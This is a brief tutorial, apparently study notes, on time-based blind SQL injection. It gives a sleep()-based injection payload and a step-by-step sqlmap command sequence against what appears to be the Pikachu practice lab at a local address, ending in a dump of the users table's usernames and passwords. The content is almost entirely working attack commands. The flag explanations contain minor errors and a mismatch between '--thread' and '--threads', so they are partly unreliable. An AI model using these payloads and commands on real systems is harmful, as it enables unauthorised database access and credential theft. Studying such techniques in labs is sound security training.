time injection
Utilization principle
Mainly used functions
sleep()
substring()
if()
example:
1' and if(substring((select * from students limit1),1,1)='a',sleep(5),0)
#当条件满足时,进行睡眠
Injection using sqlmap
1. Query whether there is time injection
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql
2. Get the database name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql --current-user --current-db --batch
-p:Specified detection method
-u:Specify url
-v:to display debug mode
--dbms:Specify database
--technique=T:Use time injection method
--current-user:to get current user
--current-db:Get current database
--batch:Use the default mode to automatically be y
3. Get the table name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --tables -D pikachu --batch
-D:Specify the database name
--tables:to get all the tables
4. Get the field name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --columns -D pikachu -T users --batch
-T:Specify the table name
--columns:to get all the fields
5. Obtain account password
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T -D pikachu -T users -C 'username,password' --dump --batch --thread 10
--dump:
-C:Specify the field
--threads:to specify the number of threads
